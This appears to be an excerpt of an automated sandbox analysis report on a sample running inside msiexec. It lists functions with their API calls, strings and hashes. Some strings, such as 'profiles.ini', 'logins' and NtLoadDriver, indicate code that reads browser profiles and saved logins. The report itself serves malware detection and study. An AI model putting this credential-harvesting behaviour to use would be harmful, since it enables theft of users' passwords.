                                                                                        • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                        • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                        • API String ID: 4111938811-1819279800
                                                                                        • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                        • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                        • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                        • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                        Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                        • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                        • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                        • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                        • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                        • EndDialog.USER32(?,?), ref: 0040135E
                                                                                        • DeleteObject.GDI32(?), ref: 0040136A
                                                                                        • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                        • ShowWindow.USER32(00000000), ref: 00401398
                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                        • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                        • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                        • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                        • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                        • String ID:
                                                                                        • API String ID: 829165378-0
                                                                                        • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                        • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                        • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                        • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                        Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00404172
                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                        • wcscpy.MSVCRT ref: 004041D6
                                                                                        • wcscpy.MSVCRT ref: 004041E7
                                                                                        • memset.MSVCRT ref: 00404200
                                                                                        • memset.MSVCRT ref: 00404215
                                                                                        • _snwprintf.MSVCRT ref: 0040422F
                                                                                        • wcscpy.MSVCRT ref: 00404242
                                                                                        • memset.MSVCRT ref: 0040426E
                                                                                        • memset.MSVCRT ref: 004042CD
                                                                                        • memset.MSVCRT ref: 004042E2
                                                                                        • _snwprintf.MSVCRT ref: 004042FE
                                                                                        • wcscpy.MSVCRT ref: 00404311
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                        • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                        • API String ID: 2454223109-1580313836
                                                                                        • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                        • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                        • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                        • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                        Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                        • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                        • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                        • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                        • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                        • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                        • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                        • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                        • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                        • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                        • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                        • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                          • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                          • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                        • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                        • API String ID: 4054529287-3175352466
                                                                                        • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                        • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                        • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                        • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                        Function 00414F1E Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                        • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                        • API String ID: 3143752011-1996832678
                                                                                        • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                        • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                        • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                        • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                        Function 0041352F Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                        • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                        • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                        • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                        • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                        • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                        • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                        • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                        • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$HandleModule
                                                                                        • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                        • API String ID: 667068680-2887671607
                                                                                        • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                        • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                        • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                        • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                        Function 0040FB5D Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                        • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                        • API String ID: 1607361635-601624466
                                                                                        • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                        • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                        • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                        • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                        Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _snwprintf$memset$wcscpy
                                                                                        • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                        • API String ID: 2000436516-3842416460
                                                                                        • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                        • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                        • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                        • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                        Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                          • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                          • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                          • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                          • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                          • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                          • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                          • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                          • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                          • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                          • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                        • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                        • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                        • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                        • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                        • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                        • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                        • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                        • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                        • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                        • String ID:
                                                                                        • API String ID: 1043902810-0
                                                                                        • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                        • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                        • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                        • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                        Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                                        • _snwprintf.MSVCRT ref: 0044488A
                                                                                        • wcscpy.MSVCRT ref: 004448B4
                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ??2@??3@_snwprintfwcscpy
                                                                                        • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                        • API String ID: 2899246560-1542517562
                                                                                        • Opcode ID: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                                                        • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                        • Opcode Fuzzy Hash: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                                                        • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                        Function 0040DBA7 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040DBCD
                                                                                        • memset.MSVCRT ref: 0040DBE9
                                                                                          • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                          • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                                          • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                          • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                        • wcscpy.MSVCRT ref: 0040DC2D
                                                                                        • wcscpy.MSVCRT ref: 0040DC3C
                                                                                        • wcscpy.MSVCRT ref: 0040DC4C
                                                                                        • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                                        • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                                        • wcscpy.MSVCRT ref: 0040DCC3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                        • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                        • API String ID: 3330709923-517860148
                                                                                        • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                        • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                        • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                        • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                        Function 00407FDF Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 228COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                          • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                          • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                        • memset.MSVCRT ref: 0040806A
                                                                                        • memset.MSVCRT ref: 0040807F
                                                                                        • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                        • _wcsicmp.MSVCRT ref: 004081C3
                                                                                        • memset.MSVCRT ref: 004081E4
                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                          • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                          • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                          • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                          • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                          • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                          • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                          • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                          • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                          • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                          • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                        • String ID: logins$null
                                                                                        • API String ID: 2148543256-2163367763
                                                                                        • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                        • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                        • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                        • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                        Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                          • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                        • memset.MSVCRT ref: 004085CF
                                                                                        • memset.MSVCRT ref: 004085F1
                                                                                        • memset.MSVCRT ref: 00408606
                                                                                        • strcmp.MSVCRT ref: 00408645
                                                                                        • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                        • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                        • memset.MSVCRT ref: 0040870E
                                                                                        • strcmp.MSVCRT ref: 0040876B
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                        • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                        • String ID: ---
                                                                                        • API String ID: 3437578500-2854292027
                                                                                        • Opcode ID: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                                                        • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                        • Opcode Fuzzy Hash: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                                                        • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                        Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0041087D
                                                                                        • memset.MSVCRT ref: 00410892
                                                                                        • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                        • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                        • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                        • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                        • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                        • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                        • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                        • DeleteObject.GDI32(?), ref: 004109D0
                                                                                        • DeleteObject.GDI32(?), ref: 004109D6
                                                                                        • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
